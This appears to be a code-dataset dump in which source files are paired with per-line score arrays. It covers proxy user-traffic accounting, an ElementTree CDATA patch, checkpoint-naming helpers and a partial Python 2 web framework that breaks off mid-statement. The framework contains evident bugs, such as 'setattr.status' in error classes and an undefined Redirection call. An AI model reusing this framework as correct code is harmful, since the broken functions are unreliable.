range(len(nodeinfo)):\n", "\t\t\tnode_info_dict[node_info_keys[column]] = nodeinfo[column]\n", "\t\tself.cfg['transfer_mul'] = float(node_info_dict['traffic_rate'])\n", "\n", "\t\tcur = conn.cursor()\n", "\t\tcur.execute(\"SELECT \" + ','.join(keys) + \" FROM user\")\n", "\t\trows = []\n", "\t\tfor r in cur.fetchall():\n", "\t\t\td = {}\n", "\t\t\tfor column in range(len(keys)):\n", "\t\t\t\td[keys[column]] = r[column]\n", "\t\t\trows.append(d)\n", "\t\tcur.close()\n", "\t\treturn rows\n", "\n", "\tdef load(self):\n", "\t\timport os\n", "\t\treturn os.popen(\"cat /proc/loadavg | awk '{ print $1\\\" \\\"$2\\\" \\\"$3 }'\").readlines()[0]\n", "\n", "\tdef uptime(self):\n", "\t\treturn time.time() - self.start_time\n", "\n", "\tdef traffic_format(self, traffic):\n", "\t\tif traffic < 1024 * 8:\n", "\t\t\treturn str(int(traffic)) + \"B\";\n", "\n", "\t\tif traffic < 1024 * 1024 * 2:\n", "\t\t\treturn str(round((traffic / 1024.0), 2)) + \"KB\";\n", "\n", "\t\treturn str(round((traffic / 1048576.0), 2)) + \"MB\";\n", "\n", "class MuJsonTransfer(TransferBase):\n", "\tdef __init__(self):\n", "\t\tsuper(MuJsonTransfer, self).__init__()\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport json\n", "\t\trows = None\n", "\n", "\t\tconfig_path = get_config().MUDB_FILE\n", "\t\twith open(config_path, 'rb+') as f:\n", "\t\t\trows = json.loads(f.read().decode('utf8'))\n", "\t\t\tfor row in rows:\n", "\t\t\t\tif \"port\" in row:\n", "\t\t\t\t\tport = row[\"port\"]\n", "\t\t\t\t\tif port in dt_transfer:\n", "\t\t\t\t\t\trow[\"u\"] += dt_transfer[port][0]\n", "\t\t\t\t\t\trow[\"d\"] += dt_transfer[port][1]\n", "\n", "\t\tif rows:\n", "\t\t\toutput = json.dumps(rows, sort_keys=True, indent=4, separators=(',', ': '))\n", "\t\t\twith open(config_path, 'r+') as f:\n", "\t\t\t\tf.write(output)\n", "\t\t\t\tf.truncate()\n", "\n", "\t\treturn dt_transfer\n", "\n", "\tdef pull_db_all_user(self):\n", "\t\timport json\n", "\t\trows = None\n", "\n", "\t\tconfig_path = get_config().MUDB_FILE\n", "\t\twith open(config_path, 'rb+') as f:\n", "\t\t\trows = json.loads(f.read().decode('utf8'))\n", "\t\t\tfor row in rows:\n", "\t\t\t\ttry:\n", "\t\t\t\t\tif 'forbidden_ip' in row:\n", "\t\t\t\t\t\trow['forbidden_ip'] = common.IPNetwork(row['forbidden_ip'])\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\tlogging.error(e)\n", "\t\t\t\ttry:\n", "\t\t\t\t\tif 'forbidden_port' in row:\n", "\t\t\t\t\t\trow['forbidden_port'] = common.PortRange(row['forbidden_port'])\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\tlogging.error(e)\n", "\n", "\t\treturn rows\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.047619047619047616, 0.05263157894736842, 0.030303030303030304, 0.013157894736842105, 0.03333333333333333, 0.030303030303030304, 0.045454545454545456, 0.037037037037037035, 0.016666666666666666, 0.043478260869565216, 0, 0.047619047619047616, 0.14285714285714285, 0, 0.034482758620689655, 0.03571428571428571, 0.1, 0.14285714285714285, 0.022727272727272728, 0.014925373134328358, 0.16666666666666666, 0.05263157894736842, 0.029411764705882353, 0.037037037037037035, 0.019417475728155338, 0.07142857142857142, 0.017241379310344827, 0.038461538461538464, 0.014492753623188406, 0.03636363636363636, 0.1, 0.014705882352941176, 0.1111111111111111, 0.017543859649122806, 0.07142857142857142, 0.014925373134328358, 0.027777777777777776, 0.017241379310344827, 0.012987012987012988, 0.1111111111111111, 0.013157894736842105, 0.03125, 0, 0.018518518518518517, 0.027777777777777776, 0.0392156862745098, 0.019230769230769232, 0.024390243902439025, 0, 0.017241379310344827, 0.16666666666666666, 0.15384615384615385, 0.14285714285714285, 0.020833333333333332, 0.04, 0.022727272727272728, 0.05263157894736842, 0.05263157894736842, 0.05263157894736842, 0.125, 0.01834862385321101, 0.038461538461538464, 0.05555555555555555, 0, 0.045454545454545456, 0.023255813953488372, 0.03333333333333333, 0.05263157894736842, 0.02040816326530612, 0, 0.01680672268907563, 0.030303030303030304, 0.029411764705882353, 0.037037037037037035, 0, 0.01818181818181818, 0.037037037037037035, 0.02702702702702703, 0.023255813953488372, 0, 0.03225806451612903, 0.03225806451612903, 0.1111111111111111, 0.0136986301369863, 0.07692307692307693, 0, 0.017543859649122806, 0.05555555555555555, 0.01694915254237288, 0.0196078431372549, 0.1, 0.043478260869565216, 0.016666666666666666, 0.015873015873015872, 0.02702702702702703, 0.013888888888888888, 0.04, 0.13333333333333333, 0.024096385542168676, 0.014705882352941176, 0.02702702702702703, 0.013888888888888888, 0.04, 0.13333333333333333, 0.09523809523809523, 0.05263157894736842, 0.02197802197802198, 0.019230769230769232, 0.025, 0, 0.01282051282051282, 0.0625, 0.021052631578947368, 0.024390243902439025, 0.017241379310344827, 0.019230769230769232, 0, 0.041666666666666664, 0.029411764705882353, 0.1111111111111111, 0.1111111111111111, 0.022988505747126436, 0.017543859649122806, 0.023255813953488372, 0.023809523809523808, 0, 0.037037037037037035, 0.02702702702702703, 0.024390243902439025, 0.02857142857142857, 0.027777777777777776, 0.021052631578947368, 0.024390243902439025, 0.017241379310344827, 0.019230769230769232, 0, 0.03571428571428571, 0.038461538461538464, 0.03333333333333333, 0.038461538461538464, 0.03333333333333333, 0.045454545454545456, 0, 0.06666666666666667, 0.05, 0.01282051282051282, 0.017543859649122806, 0.02, 0.024096385542168676, 0.017543859649122806, 0.02, 0, 0.06666666666666667, 0.047619047619047616, 0.0625, 0.07142857142857142, 0.047619047619047616, 0.06666666666666667, 0.027777777777777776, 0.058823529411764705, 0.045454545454545456, 0.14285714285714285, 0.06666666666666667, 0.05555555555555555, 0.037037037037037035, 0.1111111111111111, 0.027777777777777776, 0.023255813953488372, 0.07142857142857142, 0.030303030303030304, 0.015873015873015872, 0.045454545454545456, 0.037037037037037035, 0.027777777777777776, 0.038461538461538464, 0.043478260869565216, 0.018518518518518517, 0.09090909090909091, 0.030303030303030304, 0.125, 0.03571428571428571, 0.02857142857142857, 0.047619047619047616, 0, 0.06666666666666667, 0.043478260869565216, 0.047619047619047616, 0.038461538461538464, 0, 0.03125, 0.047619047619047616, 0.02702702702702703, 0.06666666666666667, 0.041666666666666664, 0.058823529411764705, 0.058823529411764705, 0.043478260869565216, 0.041666666666666664, 0.058823529411764705, 0.041666666666666664, 0.05, 0.058823529411764705, 0.05263157894736842, 0.05555555555555555, 0.05555555555555555, 0, 0.047619047619047616, 0.07142857142857142, 0.023809523809523808, 0.07692307692307693, 0.02702702702702703, 0.022222222222222223, 0, 0.1, 0.041666666666666664, 0, 0.024390243902439025, 0.058823529411764705, 0.043478260869565216, 0.6666666666666666, 0.034482758620689655, 0.045454545454545456, 0.043478260869565216, 0.045454545454545456, 0.038461538461538464, 0, 0.03125, 0.03333333333333333, 0.014285714285714285, 0.021739130434782608, 0.07692307692307693, 0.03571428571428571, 0.037037037037037035, 0, 0.02127659574468085, 0.021052631578947368, 0.029411764705882353, 0, 0.03125, 0.03225806451612903, 0.1111111111111111, 0.034482758620689655, 0, 0.037037037037037035, 0.038461538461538464, 0.014492753623188406, 0.04081632653061224, 0.022727272727272728, 0.023809523809523808, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 0.03508771929824561, 0.025, 0, 0.045454545454545456, 0.04, 0.07142857142857142, 0.0625, 0.06666666666666667, 0.04, 0, 0.034482758620689655, 0.058823529411764705, 0.15384615384615385, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 0.03508771929824561, 0.025, 0, 0.029411764705882353, 0.06666666666666667, 0.07142857142857142, 0, 0.03125, 0.14285714285714285, 0.020833333333333332, 0.022727272727272728, 0.04, 0.041666666666666664, 0, 0.045454545454545456, 0.017543859649122806, 0.08333333333333333, 0.037037037037037035, 0.1, 0.02857142857142857, 0.03125, 0.05555555555555555, 0.07142857142857142, 0.07142857142857142, 0, 0.03125, 0.047619047619047616, 0.02564102564102564, 0.027777777777777776, 0.0196078431372549, 0.0136986301369863, 0.03125, 0, 0.024390243902439025, 0.058823529411764705, 0.043478260869565216, 0, 0.034482758620689655, 0.045454545454545456, 0.043478260869565216, 0.045454545454545456, 0.038461538461538464, 0, 0.020833333333333332, 0.04, 0, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 0.03508771929824561, 0.025, 0.041666666666666664, 0, 0.03125, 0.03333333333333333, 0.014084507042253521, 0, 0.014285714285714285, 0.021739130434782608, 0.01818181818181818, 0.07692307692307693, 0.03571428571428571, 0.037037037037037035, 0, 0.02127659574468085, 0.021052631578947368, 0.029411764705882353, 0, 0.043478260869565216, 0.125, 0.029411764705882353, 0.02142857142857143, 0.038461538461538464, 0.03529411764705882, 0.01818181818181818, 0.18181818181818182, 0.020833333333333332, 0.06666666666666667, 0, 0.03125, 0.03225806451612903, 0.1111111111111111, 0.034482758620689655, 0, 0.037037037037037035, 0.014285714285714285, 0.02, 0.022222222222222223, 0.023255813953488372, 0.043478260869565216, 0.038461538461538464, 0.06666666666666667, 0, 0.14285714285714285, 0.043478260869565216, 0.02608695652173913, 0.03296703296703297, 0.06666666666666667, 0, 0.043478260869565216, 0.02586206896551724, 0.0410958904109589, 0.02, 0.06666666666666667, 0.2, 0.014084507042253521, 0, 0.06666666666666667, 0.04, 0, 0.03125, 0.14285714285714285, 0.020833333333333332, 0.022727272727272728, 0.04, 0.041666666666666664, 0, 0.045454545454545456, 0, 0.027777777777777776, 0.02608695652173913, 0.03571428571428571, 0, 0.08695652173913043, 0.07692307692307693, 0.06666666666666667, 0.058823529411764705, 0.06666666666666667, 0.07142857142857142, 0, 0.045454545454545456, 0.02631578947368421, 0.01639344262295082, 0.014925373134328358, 0, 0.045454545454545456, 0.017543859649122806, 0.08333333333333333, 0.037037037037037035, 0.1, 0.02857142857142857, 0.03125, 0.05555555555555555, 0.07142857142857142, 0.07142857142857142, 0, 0.058823529411764705, 0.08333333333333333, 0.02247191011235955, 0, 0.05263157894736842, 0.02564102564102564, 0, 0.027777777777777776, 0.04, 0.05714285714285714, 0, 0.03125, 0.038461538461538464, 0, 0.037037037037037035, 0, 0.027777777777777776, 0.047619047619047616, 0.024390243902439025, 0, 0.024390243902439025, 0.07142857142857142, 0.07142857142857142, 0, 0.02564102564102564, 0.02631578947368421, 0.021739130434782608, 0.05, 0.045454545454545456, 0.041666666666666664, 0.034482758620689655, 0.02564102564102564, 0.02564102564102564, 0, 0.09090909090909091, 0.012658227848101266, 0.02631578947368421, 0.05, 0.058823529411764705, 0, 0.047619047619047616, 0, 0.034482758620689655, 0.07142857142857142, 0.07142857142857142, 0, 0.02564102564102564, 0.02631578947368421, 0.021739130434782608, 0.05, 0.1111111111111111, 0.03225806451612903, 0.015151515151515152, 0.037037037037037035, 0.045454545454545456, 0.1111111111111111, 0.030303030303030304, 0.014285714285714285, 0.037037037037037035, 0.045454545454545456, 0, 0.07142857142857142, 1 ]
505
0.041377
false
#!/usr/bin/env python #coding:utf-8 # Author: mozman # Purpose: a hack to generate XML containing CDATA by ElementTree # Created: 26.05.2012 # Copyright (C) 2012, Manfred Moitzi # License: MIT License # usage: # # from svgwrite.etree import etree, CDATA # # element = etree.Element('myTag') # element.append(CDATA("< and >")) # # assert etree.tostring(element) == "<myTag><![CDATA[< and >]]></myTag>" import sys PY3 = sys.version_info[0] > 2 import xml.etree.ElementTree as etree CDATA_TPL = "<![CDATA[%s]]>" CDATA_TAG = CDATA_TPL def CDATA(text): element = etree.Element(CDATA_TAG) element.text = text return element original_serialize_xml = etree._serialize_xml if PY3: def _serialize_xml_with_CDATA_support(write, elem, qnames, namespaces, **kwargs): if elem.tag == CDATA_TAG: write(CDATA_TPL % elem.text) else: original_serialize_xml(write, elem, qnames, namespaces, **kwargs) else: def _serialize_xml_with_CDATA_support(write, elem, encoding, qnames, namespaces): if elem.tag == CDATA_TAG: write(CDATA_TPL % elem.text.encode(encoding)) else: original_serialize_xml(write, elem, encoding, qnames, namespaces) # ugly, ugly, ugly patching etree._serialize_xml = _serialize_xml_with_CDATA_support
[ "#!/usr/bin/env python\n", "#coding:utf-8\n", "# Author: mozman\n", "# Purpose: a hack to generate XML containing CDATA by ElementTree\n", "# Created: 26.05.2012\n", "# Copyright (C) 2012, Manfred Moitzi\n", "# License: MIT License\n", "\n", "# usage:\n", "#\n", "# from svgwrite.etree import etree, CDATA\n", "#\n", "# element = etree.Element('myTag')\n", "# element.append(CDATA(\"< and >\"))\n", "#\n", "# assert etree.tostring(element) == \"<myTag><![CDATA[< and >]]></myTag>\"\n", "\n", "\n", "import sys\n", "PY3 = sys.version_info[0] > 2\n", "\n", "import xml.etree.ElementTree as etree\n", "\n", "CDATA_TPL = \"<![CDATA[%s]]>\"\n", "CDATA_TAG = CDATA_TPL\n", "\n", "\n", "def CDATA(text):\n", " element = etree.Element(CDATA_TAG)\n", " element.text = text\n", " return element\n", "\n", "original_serialize_xml = etree._serialize_xml\n", "\n", "if PY3:\n", " def _serialize_xml_with_CDATA_support(write, elem, qnames, namespaces, **kwargs):\n", " if elem.tag == CDATA_TAG:\n", " write(CDATA_TPL % elem.text)\n", " else:\n", " original_serialize_xml(write, elem, qnames, namespaces, **kwargs)\n", "else:\n", " def _serialize_xml_with_CDATA_support(write, elem, encoding, qnames, namespaces):\n", " if elem.tag == CDATA_TAG:\n", " write(CDATA_TPL % elem.text.encode(encoding))\n", " else:\n", " original_serialize_xml(write, elem, encoding, qnames, namespaces)\n", "\n", "# ugly, ugly, ugly patching\n", "etree._serialize_xml = _serialize_xml_with_CDATA_support\n" ]
[ 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0 ]
49
0.002913
false
 def stringize(x) : return str(x) if type(x) is not list and type(x) is not tuple else \ '-'.join(x) def buildPickleInterim(base, epoch, layer=None) : '''Create a structured name for the intermediate synapse.''' outName = base if layer is not None : outName += '_layer'+ str(layer) outName += '_epoch' + str(epoch) + '.pkl.gz' return outName def buildPickleFinal(base, appName, dataName, epoch, accuracy=None, cost=None) : '''Create a structured name for the final synapse.''' from os.path import splitext, basename outName = base + 'Final_' + \ str(splitext(basename(appName))[0]) + '_' + str(dataName) if accuracy is not None : outName += '_acc'+ str(accuracy) if cost is not None : outName += '_cost'+ str(cost) outName += '_epoch' + str(epoch) + '.pkl.gz' return outName def resumeEpoch(synapse) : '''Return the epoch number for this synapse file. If it cannot be determined, zero will be returned. ''' import re return 0 if synapse is None or 'epoch' not in synapse else \ int(re.findall(r'(?<=epoch)\d+', synapse)[0]) def resumeLayer(synapse) : '''Return the current layer for this synapse file. If it cannot be determined, zero will be returned. ''' import re return 0 if synapse is None or 'layer' not in synapse else \ int(re.findall(r'(?<=layer)\d+', synapse)[0])
[ "\n", "def stringize(x) :\n", " return str(x) if type(x) is not list and type(x) is not tuple else \\\n", " '-'.join(x)\n", "\n", "def buildPickleInterim(base, epoch, layer=None) :\n", " '''Create a structured name for the intermediate synapse.'''\n", " outName = base\n", " if layer is not None :\n", " outName += '_layer'+ str(layer)\n", " outName += '_epoch' + str(epoch) + '.pkl.gz'\n", " return outName\n", "\n", "def buildPickleFinal(base, appName, dataName, epoch, \n", " accuracy=None, cost=None) :\n", " '''Create a structured name for the final synapse.'''\n", " from os.path import splitext, basename\n", " outName = base + 'Final_' + \\\n", " str(splitext(basename(appName))[0]) + '_' + str(dataName)\n", " if accuracy is not None :\n", " outName += '_acc'+ str(accuracy)\n", " if cost is not None :\n", " outName += '_cost'+ str(cost)\n", " outName += '_epoch' + str(epoch) + '.pkl.gz'\n", " return outName\n", "\n", "def resumeEpoch(synapse) :\n", " '''Return the epoch number for this synapse file. If it cannot be \n", " determined, zero will be returned. \n", " '''\n", " import re\n", " return 0 if synapse is None or 'epoch' not in synapse else \\\n", " int(re.findall(r'(?<=epoch)\\d+', synapse)[0])\n", "\n", "def resumeLayer(synapse) :\n", " '''Return the current layer for this synapse file. If it cannot be \n", " determined, zero will be returned. \n", " '''\n", " import re\n", " return 0 if synapse is None or 'layer' not in synapse else \\\n", " int(re.findall(r'(?<=layer)\\d+', synapse)[0])\n" ]
[ 0, 0.05263157894736842, 0, 0, 0, 0.04, 0, 0, 0.037037037037037035, 0.025, 0, 0, 0, 0.037037037037037035, 0.02040816326530612, 0, 0, 0, 0.013888888888888888, 0.03333333333333333, 0.024390243902439025, 0.038461538461538464, 0.02631578947368421, 0, 0, 0, 0.07407407407407407, 0.014084507042253521, 0.023255813953488372, 0, 0, 0, 0.017543859649122806, 0, 0.07407407407407407, 0.013888888888888888, 0.023255813953488372, 0, 0, 0, 0.017543859649122806 ]
41
0.014786
false
#!/usr/bin/env python # -*- coding: utf-8 -*- import types import os import re import cgi import sys import time import datetime import functools import mimetypes import threading import logging import urllib import traceback try: from cStringIO import StringIO except ImportError: from StringIO import StringIO ctx = threading.local() class Dict(dict): def __init__(self, names=(), values=(), **kw): super(Dict, self).__init__(**kw) for k, v in zip(names, values): self[k] = v def __getattr__(self, key): try: return self[key] except KeyError: raise AttributeError(r"'Dict' object has no attribute '%s'" % key) def __setattr__(self, key, value): self[key] = value _TIMEDELTA_ZERO = datetime.timedelta(0) # timezone as UTC+8:00, UTC-10:00 _RE_TZ = re.compile('^([\+\-])([0-9]{1,2})\:([0-9]{1,2})$') class UTC(datetime.tzinfo): def __init__(self, utc): utc = str(utc.strip().upper()) mt = _RE_TZ.match(utc) if mt: minus = mt.group(1) == '-' h = int(mt.group(2)) m = int(mt.group(3)) if minus: h, m = (-h), (-m) self._utcoffset = datetime.timedelta(hours=h, minutes=m) self._tzname = 'UTC%s' % utc else: raise ValueError('bad utc time zone') def utcoffset(self, dt): return self._utcoffset def dst(self, dt): return _TIMEDELTA_ZERO def tzname(self, dt): return self._tzname def __str__(self): return 'UTC tzinfo object (%s)' % self._tzname __repr__ = __str__ # all known response statues: _RESPONSE_STATUSES = { # Informational 100: 'Continue', 101: 'Switching Protocols', 102: 'Processing', # Successful 200: 'OK', 201: 'Created', 202: 'Accepted', 203: 'Non-Authoritative Information', 204: 'No Content', 205: 'Reset Content', 206: 'Partial Content', 207: 'Multi Status', 226: 'IM Used', # Redirection 300: 'Multiple Choices', 301: 'Moved Permanently', 302: 'Found', 303: 'See Other', 304: 'Not Modified', 305: 'Use Proxy', 307: 'Temporary Redirect', # Client Error 400: 'Bad Request', 401: 'Unauthorized', 402: 'Payment Required', 403: 'Forbidden', 404: 'Not Found', 405: 'Method Not Allowed', 406: 'Not Acceptable', 407: 'Proxy Authentication Required', 408: 'Request Timeout', 409: 'Conflict', 410: 'Gone', 411: 'Length Required', 412: 'Precondition Failed', 413: 'Request Entity Too Large', 414: 'Request URI Too Long', 415: 'Unsupported Media Type', 416: 'Requested Range Not Satisfiable', 417: 'Expectation Failed', 418: "I'm a teapot", 422: 'Unprocessable Entity', 423: 'Locked', 424: 'Failed Dependency', 426: 'Upgrade Required', # Server Error 500: 'Internal Server Error', 501: 'Not Implemented', 502: 'Bad Gateway', 503: 'Service Unavailable', 504: 'Gateway Timeout', 505: 'HTTP Version Not Supported', 507: 'Insufficient Storage', 510: 'Not Extended', } _RE_RESPONSE_STATUS = re.compile(r'^\d\d\d(\ [\w\ ]+)?$') _RESPONSE_HEADERS = ( 'Accept-Ranges', 'Age', 'Allow', 'Cache-Control', 'Connection', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Location', 'Content-MD5', 'Content-Disposition', 'Content-Range', 'Content-Type', 'Date', 'ETag', 'Expires', 'Last-Modified', 'Link', 'Location', 'P3P', 'Pragma', 'Proxy-Authenticate', 'Refresh', 'Retry-After', 'Server', 'Set-Cookie', 'Strict-Transport-Security', 'Trailer', 'Transfer-Encoding', 'Vary', 'Via', 'Warning', 'WWW-Authenticate', 'X-Frame-Options', 'X-XSS-Protection', 'X-Content-Type-Options', 'X-Forwarded-Proto', 'X-Powered-By', 'X-UA-Compatible', ) _RESPONSE_HEADER_DICT = dict( zip(map(lambda x: x.upper(), _RESPONSE_HEADERS), _RESPONSE_HEADERS)) _HEADER_X_POWERED_BY = ('X-Powered-By', 'transwarp/1.0') class HttpError(Exception): def __init__(self, code): super(HttpError, self).__init__() self.status = '%d %s' % (code, _RESPONSE_STATUSES[code]) def header(self, name, value): if not hasattr(self, '_headers'): self._headers = [_HEADER_X_POWERED_BY] self._headers.append((name, value)) @property def headers(self): if hasattr(self, '_headers'): return self._headers return [] def __str__(self): return setattr.status __repr__ = __str__ class RedirectError(HttpError): """docstring for RedirectError""" def __init__(self, code, location): super(RedirectError, self).__init__() self.location = location def __str__(self): return '%s, %s' % (setattr.status, self.location) __repr__ = __str__ def badrequest(): return HttpError(400) def unauthorized(): return HttpError(401) def forbidden(): return HttpError(403) def notfound(): return HttpError(404) def conflict(): return HttpError(409) def internalerror(): return HttpError(500) def redirect(location): return RedirectError(301, location) def found(logging): return Redirection(302, location) def seeother(location): return RedirectError(303, location) def _to_str(s): if isinstance(s, str): return s if isinstance(s, unicode): return s.encode('utf-8') return str(s) def _to_unicode(s, encoding='utf-8'): return s.decode('utf-8') def _quote(s, encoding='utf-8'): if isinstance(s, unicode): s = s.encode(encoding) return urllib.quote(s) def _unquote(s, encoding='utf-8'): return urllib.unquote(s).decode(encoding) def get(path): def _decorator(func): func.__web_route__ = path func.__web_method__ = 'GET' return func return _decorator def post(path): def _decorator(func): func.__web_route__ = path func.__web_method__ = 'POST' return func return _decorator _re_route = re.compile(r'(\:[a-zA-Z_]\w*)') def _build_regex(path): r''' Convert route path to regex. >>> _build_regex('/path/to/:file') '^\\/path\\/to\\/(?P<file>[^\\/]+)$' >>> _build_regex('/:user/:comments/list') '^\\/(?P<user>[^\\/]+)\\/(?P<comments>[^\\/]+)\\/list$' >>> _build_regex(':id-:pid/:w') '^(?P<id>[^\\/]+)\\-(?P<pid>[^\\/]+)\\/(?P<w>[^\\/]+)$' ''' re_list = ['^'] var_list = [] is_var = False for v in _re_route.split(path): if is_var: var_name = v[1:] var_list.append(var_name) re_list.append(r'(?P<%s>[^\/]+)' % var_name) else: s = '' for ch in v: if ch >= '0' and ch <= '9': s = s + ch elif ch >= 'A' and ch <= 'Z': s = s + ch elif ch >= 'a' and ch <= 'z': s = s + ch else: s = s + '\\' + ch re_list.append(s) is_var = not is_var re_list.append('$') return ''.join(re_list) class Route(object): def __init__(self, func): self.path = func.__web_route__ self.method = func.__web_method__ self.is_static = _re_route.search(self.path) is None if not self.is_static: self.route = re.compile(_build_regex(self.path)) self.func = func def match(self, url): m = self.route.match(url) if m: return m.groups() return None def __call__(self, *args): return self.func(*args) def __str__(self): if self.is_static: return 'Route(static,%s,path=%s)' % (self.method, self.path) return 'Route(dynamic,%s,path=%s)' % (self.method, self.path) __repr__ = __str__ def _static_file_generator(fpath): BLOCK_SIZE = 8192 with open(fpath, 'rb') as f: block = f.read(BLOCK_SIZE) while block: yield block block = f.read(BLOCK_SIZE) class StaticFileRoute(object): def __init__(self): self.method = 'GET' self.is_static = False self.route = re.compile('^/static/(.+)$') def match(self, url): if url.startswith('/static/'): return (url[1:],) return None def __call__(self, *args): fpath = os.path.join(ctx.application.document_root, args[0]) if not os.path.isfile(fpath): raise notfound() fext = os.path.splitext(fpath)[1] ctx.response.content_type = mimetypes.types_map.get( fext.lower(), 'application/octet-stream') return _static_file_generator(fpath) def favicon_handler(): return static_file_handler('/favicon.ico') class MultipartFile(object): def __init__(self, storage): self.filename = _to_unicode(storage.filename) self.file = storage.file class Request(object): def __init__(self, environ): self._environ = environ def _parse_input(self): def _convert(item): if isinstance(item, list): return [_to_unicode(i.value) for i in item] if item.filename: return MultipartFile(item) return _to_unicode(item.value) fs = cgi.FieldStorage( fp=self._environ['wsgi.input'], environ=self._environ, keep_blank_values=True) inputs = dict() for key in fs: inputs[key] = _convert(fs[key]) return inputs def _get_raw_input(self): if not hasattr(self, '_raw_input'): self._raw_input = self._parse_input() return self._raw_input def __getitem__(self, key): r = self._get_raw_input()[key] if isinstance(r, list): return r[0] return r def get(self, key, default=None): r = self._get_raw_input().get(key, default) if isinstance(r, list): return r[0] return r def gets(self, key): r = self._get_raw_input()[key] if isinstance(r, list): return r[:] return r def input(self, **kw): copy = Dict(**kw) raw = self._get_raw_input() for k, v in raw.iteritems(): copy[k] = v[0] if isinstance(v, list) else v return copy def get_body(self): fp = self._environ['wsgi.input'] return fp.read() @property def remote_addr(self): return self._environ.get('REMOTE_ADDR', '0.0.0.0') @property def document_root(self): return self._environ.get('DOCUMENT_ROOT', '') @property def query_string(self): return self._environ.get('QUERY_STRING', '') @property def environ(self): return self._environ @property def request_method(self): return self._environ['REQUEST_METHOD'] @property def path_info(self): return urllib.unquote(self._environ.get('PATH_INFO', '')) @property def host(self): return self._environ.get('HTTP_HOST', '') def _get_headers(self): if not hasattr(self, '_headers'): hdrs = {} for k, v in self._environ.iteritems(): if k.startswith('HTTP_'): hdrs[k[5:].replace('_', '-').upper()] = v.decode('utf-8') self._headers = hdrs return self._headers @property def headers(self): return dict(**self._get_headers()) def header(self, header, default=None): return self._get_headers().get(header.upper(), default) def _get_cookies(self): if not hasattr(self, '_cookies'): cookies = {} cookie_str = self._environ.get('HTTP_COOKIE') if cookie_str: for c in cookie_str.split(';'): pos = c.find('=') if pos > 0: cookies[c[:pos].strip()] = _unquote(c[pos+1:]) self._cookies = cookies return self._cookies @property def cookies(self): return Dict(**self._get_cookies()) def cookie(self, name, default=None): return self._get_cookies().get(name, default) UTC_0 = UTC('+00:00') class Response(object): def __init__(self): self._status = '200 OK' self._headers = {'CONTENT-TYPE': 'text/html; charset=utf-8'} def unset_header(self, name): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name if key in self._headers: del self._headers[key] def set_header(self, name, value): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name self._headers[key] = _to_str(value) def header(self, name): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name return self._headers.get(key) @property def headers(self): L = [(_RESPONSE_HEADER_DICT.get(k, k), v) for k, v in self._headers.iteritems()] if hasattr(self, '_cookies'): for v in self._cookies.itervalues(): L.append(('Set-Cookie', v)) L.append(_HEADER_X_POWERED_BY) return L @property def content_type(self): return self.header('CONTENT-TYPE') @content_type.setter def content_type(self, value): if value: self.set_header('CONTENT-TYPE', value) else: self.unset_header('CONTENT-TYPE') @property def content_length(self): return self.header('CONTENT-LENGTH') @content_length.setter def content_length(self, value): self.set_header('CONTENT-LENGTH', str(value)) def delete_cookie(self, name): self.set_cookie(name, '__deleted__', expires=0) def set_cookie(self, name, value, max_age=None, expires=None, path='/', domain=None, secure=False, http_only=True): if not hasattr(self, '_cookies'): self._cookies = {} L = ['%s=%s' % (_quote(name), _quote(value))] if expires is not None: if isinstance(expires, (float, int, long)): L.append('Expires=%s' % datetime.datetime.fromtimestamp( expires, UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT')) if isinstance(expires, (datetime.date, datetime.datetime)): L.append('Expires=%s' % expires.astimezone( UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT')) elif isinstance(max_age, (int, long)): L.append('Max-Age=%d' % max_age) L.append('Path=%s' % path) if domain: L.append('Domain=%s' % domain) if secure: L.append('Secure') if http_only: L.append('HttpOnly') self._cookies[name] = '; '.join(L) def unset_cookie(self, name): if hasattr(self, '_cookies'): if name in self._cookies: del self._cookies[name] @property def status_code(self): return int(self._status[:3]) @property def status(self): return self._status @status.setter def status(self, value): if isinstance(value, (int, long)): if 100 <= value <= 999: st = _RESPONSE_STATUSES.get(value, '') if st: self._status = '%d %s' % (value, st) else: self._status = str(value) else: raise ValueError('Bad response code: %d' % value) elif isinstance(value, basestring): if isinstance(value, unicode): value = value.encode('utf-8') if _RE_RESPONSE_STATUS.match(value): self._status = value else: raise ValueError('Bad response code: %s' % value) else: raise TypeError('Bad type of response code.') class Template(object): def __init__(self, template_name, **kw): self.template_name = template_name self.model = dict(**kw) class TemplateEngine(object): def __call__(self, path, model): return '<!-- override this method to render template -->' class Jinja2TemplateEngine(TemplateEngine): def __init__(self, templ_dir, **kw): from jinja2 import Environment, FileSystemLoader if not 'autoescape' in kw: kw['autoescape'] = True self._env = Environment(loader=FileSystemLoader(templ_dir), **kw) def add_filter(self, name, fn_filter): self._env.filters[name] = fn_filter def __call__(self, path, model): return self._env.get_template(path).render(**model).encode('utf-8') def _default_error_handler(e, start_response, is_debug): if isinstance(e, HttpError): logging.info('HttpError: %s' % e.status) headers = e.headers[:] headers.append(('Content-Type', 'text/html')) start_response(e.status, headers) return ('<html><body><h1>%s</h1></body></html>' % e.status) logging.exception('Exception:') start_response('500 Internal Server Error', [ ('Content-Type', 'text/html'), _HEADER_X_POWERED_BY]) if is_debug: return _debug() return ('<html><body><h1>500 Internal Server Error</h1><h3>%s</h3></body></html>' % str(e)) def view(path): def _decorator(func): @functools.wraps(func) def _wrapper(*args, **kw): r = func(*args, **kw) if isinstance(r, dict): logging.info('return Template') return Template(path, **r) raise ValueError( 